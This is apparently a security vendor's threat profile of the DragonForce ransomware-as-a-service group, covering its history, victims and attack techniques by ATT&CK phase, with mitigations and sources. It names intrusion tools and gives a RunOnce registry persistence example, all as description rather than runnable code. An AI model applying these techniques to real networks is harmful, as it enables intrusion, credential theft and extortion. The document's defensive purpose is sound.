What started as a pro-Palestine hacktivist group has evolved into DragonForce, a profit-driven ransomware operation now shaping the RaaS ecosystem in 2025.  Although DragonForce surfaced in late 2023, it quickly established itself within the Ransomware-as-Service (RaaS) market.  

Unlike traditional single-group gangs, DragonForce operates more like a cartel, recruiting affiliate hackers and even other RaaS operators to use its ransomware platform under a white-label model. Affiliates are free to brand attacks as their own while leveraging DragonForce's infrastructure for malware deployment, leak site hosting, and ransom negotiations. In return, the group takes a 20% share of the profits, allowing them to scale rapidly without carrying out all the attacks themselves.  

The history behind DragonForce

DragonForce emerged in 2023, initially experimenting with ransomware activity before rapidly evolving into a fully structured Ransomware-as-a-Service operation. DragonForce has also used underground forums like RAMP to advertise its operations, openly calling for affiliates and collaborators in an effort to grow its network and strengthen its position in the ransomware ecosystem. Built on leaked source code from strains like LockBit 3.0 and Conti, its encryptor provided a solid foundation that has since been adapted into variants capable of targeting Windows, Linux, VMware ESXi, BSD and NAS platforms.  

Motivated by profit rather than ideology, DragonForce has openly claimed to follow a moral code - such as avoiding certain healthcare targets and expressing empathy for critical patients though how consistently this is adhered to remains uncertain. Its modus operandi combines data theft with encryption in a double-extortion model, giving the operators significant power in ransom negotiations. From a newcomer to a sophisticated global ransomware threat, DragonForce has quickly scaled into an enterprise-style operation with growing technical maturity.

Affected Countries: United States, Australia, India, New Zealand, Singapore, Canada, United Kingdom, Ireland, France, Spain, Italy, Belgium, Sweden, Switzerland, Czechia, United Arab Emirates, Malaysia, Palau, China, Argentina, Colombia, Curacao, South Africa.

Affected Industries: Gaming, Logistics, Healthcare, Manufacturing, Government, Real Estate, Transportation, Food & Beverage, Education, Finance, Information Technology, Marketing, Hospitality, Travel, Tourism and Media.

Technical Analysis

Initial Access
DragonForce ransomware operators and affiliates often rely on a mix of technical exploits and human-targeted tactics to gain initial access into victim environments. The group also heavily depends on social engineering, including phishing emails, fake SSO portals, SIM swapping, and MFA push "bombing" to harvest credentials often targeting IT help desks to bypass authentication barriers.  

Once credentials are obtained, DragonForce actors frequently abuse valid accounts, blending in with legitimate user activity to avoid detection. This combination of vulnerability exploitation, credential theft, and misuse of legitimate accounts allows DragonForce to establish a stealthy and resilient foothold before deploying post-exploitation tools such as Cobalt Strike, Mimikatz, and SystemBC.

Vulnerabilities abused by DragonForce operators to gain initial access

‍

Execution

DragonForce ransomware operators employ multiple techniques to execute their payloads on compromised systems. One common approach is the use of the Windows Command Shell commands or DLL hijacking to run malicious components. The group also heavily abuses PowerShell, leveraging its trusted and pre-installed nature to execute scripts, disable security features, and deliver additional payloads. In observed cases, DragonForce has used hidden PowerShell, leveraging its trusted and pre-installed nature to execute scripts, disable security features, and deliver additional payloads. In some instances, DragonForce has used hidden PowerShell commands referenced in registry Run keys to ensure malware executes silently at startup. By executing code directly in memory, they effectively bypass traditional antivirus detection.  

Execution is not always purely technical, social engineering also plays a key role. Victims are tricked into running malicious files delivered via phishing emails, such as documents with hidden macros or executables disguised as PDFs. These files serve as loaders, initiating communication with attacker infrastructure and preparing the ground for ransomware deployment.

Persistence

DragonForce actors employ a variety of persistence techniques to maintain long-term access after initial compromise, leveraging methods such as scheduled tasks, creation or modification of system processes, abuse of valid accounts, and exploitation of external remote services. In several cases they have modified the Windows registry to ensure payloads survive reboots - for example by adding an entry to HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce to execute a SystemBC proxy (e.g., %TMP%\socks aug\socks.exe) at startup - thereby preserving backdoor connectivity across restarts.  

Privilege Escalation

For privilege escalation, DragonForce frequently combines native persistence mechanisms, with credential abuse to amplify access: they employ boot/autostart techniques and registry/scheduled-task modifications to ensure payloads persist across reboots, while relying on stolen or newly created legitimate accounts to retain and elevate privileges. Those credentials are then reused to move laterally via built-in services such as RDP, SMB and administrative shares, enabling them to pivot to higher-value systems; in many intrusions, adversaries also deploy post-exploitation tooling examples include Cobalt Strike and PsExec to escalate privileges, execute commands remotely, and stage further compromise. Organizations should therefore treat signs of autostart changes, anomalous account activity, and unauthorized use of remote administration tools as high-risk indicators of privilege escalation.

Defense Evasion

DragonForce actors deploy a range of defense-evasion techniques to conceal activity and frustrate analysis. Their ransomware can delete intrusion artifacts and tamper with file metadata (timestomping) to obscure timelines, while discovery routines detect sandboxing or debugging environments and prevent execution in those contexts. They frequently disable or alter security controls; killing processes, changing registry settings, and disrupting update or cloud-monitoring agents to reduce detection and response.  

In more aggressive campaigns, affiliates have used "Bring Your Own Vulnerable Driver" (BYOVD) tactics loading legitimate but vulnerable kernel drivers and abusing them to subvert endpoint protections. Organizations should therefore monitor for unexpected file-deletion events, anomalous timestamp changes, sudden service/process terminations, and the installation of uncommon or unsigned drivers as high-priority indicators of defense evasion.

Credential Access

DragonForce operators rapidly harvest credentials, commonly extracting secrets from Windows memory notably the LSASS process using tools such as Mimikatz or by dumping process memory with utilities like procdump and then analyzing it offline. They have also targeted Active Directory data stores to reconstruct credential material and have been observed collecting local administrator passwords and full credential sets that enable immediate domain-wide control. These techniques yield valid authentication tokens, hashes, and Kerberos tickets that facilitate swift privilege escalation and lateral movement.  

In a few documented incidents, harvested credentials were even written to plaintext files (e.g., “123.txt”), illustrating how quickly attackers can accumulate the account access needed to administer systems and ultimately deploy ransomware at scale.  

Discovery

DragonForce operators conduct thorough reconnaissance to map target environments and identify high-value systems prior to ransomware deployment. They enumerate network configurations and system details using commands and queries such as ipconfig/ifconfig, systeminfo, and WMI to collect IP addresses, routes, OS versions, hostnames and logged-on users, and to profile reachable systems. Active directory is heavily queried; toolkit components like AdFind are used to harvest information on domain trusts, organizational units, user and group memberships, and other directory metadata, revealing the domain's structure and potential paths to critical assets such as domain controllers and file servers. This intelligence-driven approach allows the group to locate privileged accounts, map trust relationships across domains, and plan lateral movement and the timing of disruptive actions.  

Lateral Movement

DragonForce actors routinely exploit legitimate administrative tools and native Windows services to move laterally and escalate their reach. In recent campaigns they abused the SimpleHelp remote management platform, an enterprise-sanctioned RMM gaining remote control that facilitates stealthy propagation across managed service provider networks. Their primary lateral technique remains interactive RDP sessions, leveraging harvested credentials to hop from compromised workstations to file servers and domain controllers, and when needed, enabling RDP or adding accounts to the "Remote Desktop Users" group to create new access paths.  

They also rely on SMB and administrative shares (for example \\HOST\C$) to drop and run payloads remotely. These living-off-the-land approaches let the operators blend with normal administrative activity while manually deploying tools and ransomware across the environment.

Collection

As part of their collection activities, DragonForce harvests sensitive artifacts including user credentials, system configurations, and network topology details and consolidates this information into log or dump files, preserving it for subsequent misuse such as credential replay, or targeted extortion.

Command and Control

DragonForce operators maintain and obscure remote control of compromised systems using a mix of tunnelling and covert C2 techniques. They frequently stage tools via Ingress Tool Transfer commonly over protocols like FTP or by abusing built-in utilities such as certutil.exe and PowerShell to move implants into the victim environment. Once resident, backdoors or agents (notably Cobalt Strike Beacon) are used to establish command-and-control channels that often operate over HTTP/HTTPS, allowing traffic to blend with routine web or API calls and evade simple network filtering.  

Proxy implants such as SystemBC provide additional stealth by creating SOCKS5 tunnels that mask outbound connections, so even if one channel is discovered other conduits remain available. By layering multiple delivery and C2 mechanisms, the group preserves real-time control, enable remote execution and data exfiltration, and increases the difficulty of full containment.  

Exfiltration

Before proceeding to encryption, DragonForce routinely conducts large-scale data theft, using both its C2 channels and dedicated file-transfer tools to move bulk data out of victim networks. Attackers often compress sensitive files into archives and exfiltrate them via SFTP, WebDAV, cloud storage services, anonymous FTP or by using command-line utilities such as rclone or wget to push data to attacker-controlled endpoints. In many intrusions the haul measures in gigabytes or terabytes; when victims refuse to pay, stolen material is posted to a public leak site as part of a double-extortion strategy.

Impact

DragonForce's primary objective is to render victim's data unusable by deploying a powerful encryptor across the compromised environment. The group's ransomware combines strong cryptographic primitives (commonly AES for bulk encryption and RSA for key protection) to lock files on Windows, Linux, NAS devices and virtual infrastructures, including VMware ESXi hosts allowing attackers to incapacitate entire virtual servers and escalate impact rapidly.  

Once the encryption is complete, DragonForce drops a ransom note, usually named README.txt, on the victim’s desktop and in the directories where files were encrypted. The result is both immediate operational disruption and a sustained reputational and data-privacy risk for affected organizations.

Ransom Note

DragonForce operates a dedicated leak site on the dark web to amplify pressure on victims: when ransom demands go unpaid, stolen files are published publicly, inflicting reputational damage and increasing regulatory exposure in addition to operational disruption. Although the specifics of their negotiation playbook and exact ransom figures are not broadly disclosed, the dual threat of data theft plus system encryption gives operators and affiliates substantial bargaining power.  

MITRE ATT&CK Tactics and Techniques

‍

Mitigation Strategies Against DragonForce Ransomware

• Strengthen Email Security & User Awareness - Deploy advanced filtering to block phishing emails and malicious attachments. Regularly conduct phishing simulations and security awareness training to reduce social engineering risks.
• Timely Patch & Vulnerability Management - Apply security updates without delay, prioritizing critical flaws frequently exploited in ransomware campaigns. Conduct periodic audits to identify and remediate unpatched systems.
• Credential & Authentication Controls - Enforce strong, unique passwords and mandatory rotations. Implement Multi-Factor Authentication (MFA) across all accounts, with strict emphasis on administrative and remote access.
• Remote Access Hardening - Disable RDP if unnecessary; otherwise, restrict it behind VPNs, enforce IP allow-listing, and apply least-privilege access.
• Network Segmentation & Isolation - Separate critical assets such as domain controllers, backup servers, and sensitive databases using VLANs and firewalls to limit lateral movement opportunities.
• Advanced Endpoint Detection & Monitoring - Deploy Endpoint Detection and Response (EDR) solutions tuned to detect post-exploitation tools like Cobalt Strike and Mimikatz. Incorporate behavior-based monitoring to flag anomalies such as unusual logins, privilege escalations, or excessive RDP activity.
• Application & Driver Control - Enforce application whitelisting to block unauthorized executables in user and temporary directories. Mitigate Bring Your Own Vulnerable Driver (BYOVD) attacks with solutions like Microsoft Defender Application Control.
• Access & Privilege Restrictions - Apply least-privilege principles to minimize admin or SYSTEM-level rights. Closely monitor for token manipulation, impersonation, and suspicious service creations.
• Data Protection & Loss Prevention - Use DLP solutions to detect and restrict unauthorized data transfers via SFTP, WebDAV, or cloud platforms. Implement outbound traffic filtering to block malicious IPs, Tor nodes, and ransomware leak sites.
• Robust Backup & Recovery Readiness - Maintain offline, immutable backups stored separately from the main network. Regularly test restoration processes to ensure business continuity after an attack.
• Log & Registry Monitoring - Forward system and security logs to a centralized SIEM for retention and review. Monitor for sudden log clearing, unusual registry modifications, or unauthorized scheduled task creations.
• Incident Response & Preparedness - Develop and test incident response playbooks covering detection, containment, recovery, and communication during ransomware incidents. Run tabletop exercises simulating DragonForce-style double extortion attacks.
• Threat Intelligence Integration - Continuously track Indicators of Compromise (IoCs), tactics, and affiliate behaviors linked to DragonForce through trusted intelligence feeds to stay ahead of evolving threats.

Sources Cited:

1. ‍https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/  
2. ‍https://www.resecurity.com/blog/article/dragonforce-ransomware-reverse-engineering-report  
3. ‍https://specopssoft.com/blog/dragonforce-ransomware-as-a-service/#dragonforce:-inside-heading  
4. ‍https://www.bitdefender.com/en-us/blog/businessinsights/dragonforce-ransomware-cartel  
5. ‍https://cyble.com/threat-actor-profiles/dragonforce-ransomware-group/  
6. ‍https://www.picussecurity.com/resource/blog/dragonforce-ransomware-attacks-retail-giants  
7. ‍https://socradar.io/dark-web-profile-dragonforce-ransomware/  
8. ‍https://www.bridewell.com/insights/blogs/detail/who-are-dragonforce-ransomware-group  
9. ‍https://blog.barracuda.com/2025/06/09/dragonforce-ransomware-cartel-vs--everybody  
10. ‍https://www.attackiq.com/2025/05/23/emulating-dragonforce-ransomware/  
11. ‍https://www.sentinelone.com/blog/dragonforce-ransomware-gang-from-hacktivists-to-high-street-extortionists/  
12. ‍https://www.group-ib.com/blog/dragonforce-ransomware/  
13. ‍https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/dragonforce  
14. ‍https://blackpointcyber.com/wp-content/uploads/2024/11/DragonForce.pdf  
15. ‍https://www.quorumcyber.com/malware-reports/dragonforce-ransomware-report/  
16. ‍https://cybelangel.com/who-is-the-dragonforce-ransomware-gang/  
17. ‍https://www.ransomware.live/group/dragonforce